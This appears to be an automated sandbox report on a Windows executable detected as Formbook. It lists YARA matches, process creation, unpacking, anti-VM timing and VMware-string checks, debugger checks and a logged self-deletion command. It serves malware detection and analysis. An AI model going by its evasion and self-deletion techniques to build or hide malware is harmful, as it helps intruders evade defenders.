          Source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@14/5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004041E5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,0_2_004020A6
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_01
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeFile created: C:\Users\user\AppData\Local\Temp\nsxFC19.tmpJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: AQJEKNHnWK.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: AQJEKNHnWK.exeVirustotal: Detection: 18%
          Source: AQJEKNHnWK.exeReversingLabs: Detection: 35%
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeFile read: C:\Users\user\Desktop\AQJEKNHnWK.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\AQJEKNHnWK.exe 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess created: C:\Users\user\Desktop\AQJEKNHnWK.exe 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess created: C:\Users\user\Desktop\AQJEKNHnWK.exe 'C:\Users\user\Desktop\AQJEKNHnWK.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe'Jump to behavior
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: explorer.pdbUGP source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AQJEKNHnWK.exe, 00000000.00000003.210067388.000000001F0E0000.00000004.00000001.sdmp, AQJEKNHnWK.exe, 00000001.00000002.256332303.0000000000B5F000.00000040.00000001.sdmp, explorer.exe, 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AQJEKNHnWK.exe, explorer.exe
          Source: Binary string: explorer.pdb source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeUnpacked PE file: 1.2.AQJEKNHnWK.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00415047 pushad ; ret 1_2_00415050
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041600E pushad ; retf 1_2_0041600F
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00411254 push edi; ret 1_2_00411255
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041B46C push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041B402 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041B40B push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00414D4F push FFFFFFA9h; ret 1_2_00414D62
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00ABD0D1 push ecx; ret 1_2_00ABD0E4
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_00415047 pushad ; ret 1_1_00415050
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041600E pushad ; retf 1_1_0041600F
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_00411254 push edi; ret 1_1_00411255
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041B3B5 push eax; ret 1_1_0041B408
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041B46C push eax; ret 1_1_0041B472
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041B402 push eax; ret 1_1_0041B408
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041B40B push eax; ret 1_1_0041B472
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_00414D4F push FFFFFFA9h; ret 1_1_00414D62
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0498D0D1 push ecx; ret 7_2_0498D0E4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F5047 pushad ; ret 7_2_004F5050
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F600E pushad ; retf 7_2_004F600F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F1254 push edi; ret 7_2_004F1255
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FC2CD push ss; ret 7_2_004FC2CE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FB3B5 push eax; ret 7_2_004FB408
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FB46C push eax; ret 7_2_004FB472
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FB40B push eax; ret 7_2_004FB472
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FB402 push eax; ret 7_2_004FB408
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F4D4F push FFFFFFA9h; ret 7_2_004F4D62
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeFile created: C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dllJump to dropped file
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000004E85E4 second address: 00000000004E85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000004E897E second address: 00000000004E8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Windows\explorer.exe TID: 6156Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 3252Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: explorer.exe, 00000004.00000000.237332998.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.237332998.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000004.00000000.241478036.0000000008907000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.236730090.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.234484332.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.227235190.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000004.00000000.229063771.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000007.00000002.472073266.0000000002DBC000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000000.237332998.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000004.00000000.237332998.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.237639933.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000004.00000000.229097394.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000004.00000000.234484332.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.234484332.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.234484332.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00409B20 LdrLoadDll,1_2_00409B20
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_740D1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_740D1000
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_025B187C mov eax, dword ptr fs:[00000030h]0_2_025B187C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_025B1664 mov eax, dword ptr fs:[00000030h]0_2_025B1664
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA90AF mov eax, dword ptr fs:[00000030h]1_2_00AA90AF
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9F0BF mov ecx, dword ptr fs:[00000030h]1_2_00A9F0BF
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9F0BF mov eax, dword ptr fs:[00000030h]1_2_00A9F0BF
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9F0BF mov eax, dword ptr fs:[00000030h]1_2_00A9F0BF
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69080 mov eax, dword ptr fs:[00000030h]1_2_00A69080
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE3884 mov eax, dword ptr fs:[00000030h]1_2_00AE3884
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE3884 mov eax, dword ptr fs:[00000030h]1_2_00AE3884
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A658EC mov eax, dword ptr fs:[00000030h]1_2_00A658EC
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov ecx, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]1_2_00A7B02A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]1_2_00A7B02A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]1_2_00A7B02A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]1_2_00A7B02A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B34015 mov eax, dword ptr fs:[00000030h]1_2_00B34015
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B34015 mov eax, dword ptr fs:[00000030h]1_2_00B34015
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]1_2_00AE7016
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]1_2_00AE7016
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]1_2_00AE7016
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B22073 mov eax, dword ptr fs:[00000030h]1_2_00B22073
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B31074 mov eax, dword ptr fs:[00000030h]1_2_00B31074
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A80050 mov eax, dword ptr fs:[00000030h]1_2_00A80050
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A80050 mov eax, dword ptr fs:[00000030h]1_2_00A80050
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE69A6 mov eax, dword ptr fs:[00000030h]1_2_00AE69A6
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A961A0 mov eax, dword ptr fs:[00000030h]1_2_00A961A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A961A0 mov eax, dword ptr fs:[00000030h]1_2_00A961A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]1_2_00AE51BE
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]1_2_00AE51BE
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]1_2_00AE51BE
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]1_2_00AE51BE
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8C182 mov eax, dword ptr fs:[00000030h]1_2_00A8C182
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9A185 mov eax, dword ptr fs:[00000030h]1_2_00A9A185
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92990 mov eax, dword ptr fs:[00000030h]1_2_00A92990
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A6B1E1
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A6B1E1
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A6B1E1
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AF41E8 mov eax, dword ptr fs:[00000030h]1_2_00AF41E8
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov ecx, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9513A mov eax, dword ptr fs:[00000030h]1_2_00A9513A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9513A mov eax, dword ptr fs:[00000030h]1_2_00A9513A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]1_2_00A69100
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]1_2_00A69100
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]1_2_00A69100
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6C962 mov eax, dword ptr fs:[00000030h]1_2_00A6C962
